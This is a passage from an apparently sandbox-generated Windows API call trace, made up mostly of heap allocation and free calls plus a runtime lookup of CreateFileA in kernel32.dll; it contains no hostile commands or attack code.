out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.772] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.772] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.773] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.773] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.773] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0040.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.774] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7d8 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.774] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.777] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.779] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca30 [0040.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca30, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.780] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0040.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ca30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.780] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 